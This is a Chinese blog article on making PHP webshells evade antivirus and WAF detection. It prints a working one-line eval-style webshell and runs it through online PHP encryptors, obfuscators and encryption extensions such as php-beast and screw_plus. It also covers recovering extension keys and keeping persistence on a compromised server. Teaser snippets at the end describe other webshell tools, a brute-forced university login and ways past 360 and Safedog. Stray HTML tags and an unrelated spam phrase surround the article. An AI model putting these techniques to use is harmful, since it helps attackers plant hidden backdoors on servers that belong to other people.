<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    什么?你還不會webshell免殺?

    VSole2022-07-26 16:36:58

    無擴展免殺

    1.php加密

    這里是利用phpjiami網站進行加密,進而達到加密效果

    https://www.phpjiami.com/
    

    加密前:

    <?php
    session_start();
    $a = "a";
    $s = "s";
    $c=$a.$s."sert";
    $c($_GET["1"]);
    ?>
    

    查殺效果

    可以看到這里D某和某狗都查殺

    里用php加密后效果

    查殺效果

    可以看到這里只有D某會顯示加密腳本,而某狗直接繞過

    2.dezend加密

    http://dezend.qiling.org/encrypt.html
    

    免殺效果

    可以看到dezend加密的特征還是太過明顯

    3.z5encrypt

    https://z5encrypt.com/encrypt/build
    

    4.php-obfuscator

    工具下載

    https://github.com/naneau/php-obfuscator
    

    在線工具

    https://www.phpobfuscator.cn/
    

    不太行

    5.yakpro-po

    工具下載

    https://github.com/pk-fr/yakpro-po
    

    在線工具

    https://www.php-obfuscator.com/?demo
    

    免殺效果

    img

    并不太行

    6.phpjm

    http://www.phpjm.net/encode.html
    

    加密后效果

    免殺效果

    7.Virbox

    工具下載

    https://shell.virbox.com/apply.html
    

    加密后效果

    Virbox已經屬于是商業源碼加密,基本上沒有任何特征

    但是由于這個是需要將生成好的php-cqi.exe原有的php-cqi.exe才能達到解密的效果,因此只能說作為一個權限維持的方式,先拿到權限后,修改php-cqi.exe,在上這種加密馬,作為一個權限維持

    加密過程:

    https://baijiahao.baidu.com/s?id=1671004157804653895&wfr=spider&for=pc
    

    免殺效果

    7.總結

    以上總結了webshell加密的工具,其實在非擴展的加密工具中,其原理很多就是混淆變量名和函數名,類名,命名空間等等,可以配合多個加密工具進行多種加密,當然也可以和之前文章的免殺進行結合

    擴展免殺

    由于很多企業為了防止源碼泄露,都會使用加密擴展將代碼進行加密,那么我們就可以就將計就計,將webshell也利用擴展加密,將特征消除,從而達到免殺的效果

    1.php-beast

    擴展地址

    https://github.com/liexusong/php-beast
    https://github.com/imaben/php-beast-binaries
    

    下載dll,并添加至ext中

    在php.ini 中添加該擴展

    修改configure.ini

    ; source path
    src_path = "C:/Users/12107/Desktop/demo/"
    ; destination path
    dst_path = "C:/Users/12107/Desktop/demo2/"
    ; expire time
    expire = "2021-09-08 17:01:20"
    ; encrypt type
    encrypt_type = "AES"
    

    當然也可以不使用默認密鑰

    在aes_algo_handler.c中可以修改默認密鑰

    當然如果沒有密鑰其實是無法生成一個能被解析的php文件,因此還需要通過逆向獲取dll中的密鑰

    破解參考:

    http://www.phpheidong.com/blog/article/337644/71c2cabcc769f99d7808/
    

    2.screw_plus

    環境搭建

    https://blog.oioweb.cn/64.html
    https://newsn.net/say/php-screw-plus.html
    

    破解參考:

    https://www.cnblogs.com/StudyCat/p/11268399.html
    

    3.總結

    基于擴展的免殺,如果知道密鑰,經加密后的webshell是不具備任何特征的,基本上直接通殺。

    具體步驟通過phpinfo獲取擴展信息,根據不同的加密擴展進行嘗試利用默認密鑰進行加密,通過訪問webshell來判斷密鑰是否正確,當然,這種方法其實只能用于權限維持需要拿到權限后獲取擴展文件破解后,才能穩定獲取密鑰,進而加密webshell

    免殺webshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    星辰由凌日內部大佬花了兩天時間用php語言開發的帶ui的工具,使用者可上傳由冰蝎或者天蝎生成的webshell,動態自動生成webshell。目前只支持php和jsp,其它語言各位使用者可自己去編寫腳本實現。依賴:php5.6.7+mysql+nginx后臺管理:/admin功能:1、授權功能,用戶shell生成次數限制。
    webshell之傳參方式及特征繞過傳參方式 在這里解釋一下為什么,需要講述傳參方式,由于在很多情況下,以請求頭作為參數傳遞并非waf和人工排查的重中之重且非常誤導和隱藏
    哥斯拉WebShell生成器
    引擎可以將傳統的條件、循環、函數、對象的靜態分析,目前還可以支持動態變量名、箭頭函數、反射、回調等動態特性的分析,大大的強化的未知樣本的檢測成功率。
    冰蝎流量初探
    2022-12-20 09:11:06
    本文僅針對冰蝎流量改造進行初步探討,熟悉一下整個流程,真的要繞流量設備,估計還需要其他的技巧。
    Windows defender 介紹Microsoft Defender 防病毒軟件在 Windows 1
    與此同時,隨著眾邦銀行的業務規模不斷擴大,服務客戶數量不斷提升,日益增加的服務器數量,使得系統、應用、端口等核心資產快速增加,管理難度日益增加。眾邦銀行安全負責人說。經過一段時間的磨合與實戰化運營,眾邦銀行實現了以下幾個目標: 首先是資產管理,全局在握。眾邦銀行負責人表示,目前椒圖可以幫助眾邦銀行自動識別系統和應用高危漏洞數量近700項,基本覆蓋所有主流可利用的漏洞。
    用戶名:加密密碼:密碼最后一次修改日期:兩次密碼的修改時間間隔:密碼有效期:密碼修改到期到的警告天數:密碼過期之后的寬限天數:賬號失效時間:保留。查看下pid所對應的進程文件路徑,
    0x01 前言最近遇到這樣一個場景:目標僅支持ASP腳本,而且還存在網站安全狗和360安全衛士,目前存在的兩個問題。安全狗"禁止IIS執行程序"限制了命令執行;360"進程防護"攔截了執行木馬和提權、抓明文等;這是因為wscript.shell命令執行組件被卸載了,試了下shell.application組件,結果發現也不行。當我們執行進程遷移跳出IIS的w3wp.exe進程后就已經完全繞過了安全狗"禁止IIS執行程序"限制命令執行,這時可以直接通過執行shell命令進入執行系統命令了。
    獲取到老的其他系統登錄口http://xxx.xxx.edu.cn/psy/Login2.aspx如圖,沒有任何驗證碼機制直接Burp Cluster bomb式爆破成功得到其他系統的弱口令admin,Aa123456但是老系統其他頁面已經刪除,無法正常登入后臺八嘎呀路,不是良民的干活!但推測新老系統用的同一個數據庫訪問新系統http://xxx.xxx.edu.cn/psy/Login.aspx使用密碼admin,Aa123456成功登陸后臺翻找上傳點上傳點在http://xxx.xxx.edu.cn/psy/ScaleManage/ScaleEdit.aspx?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类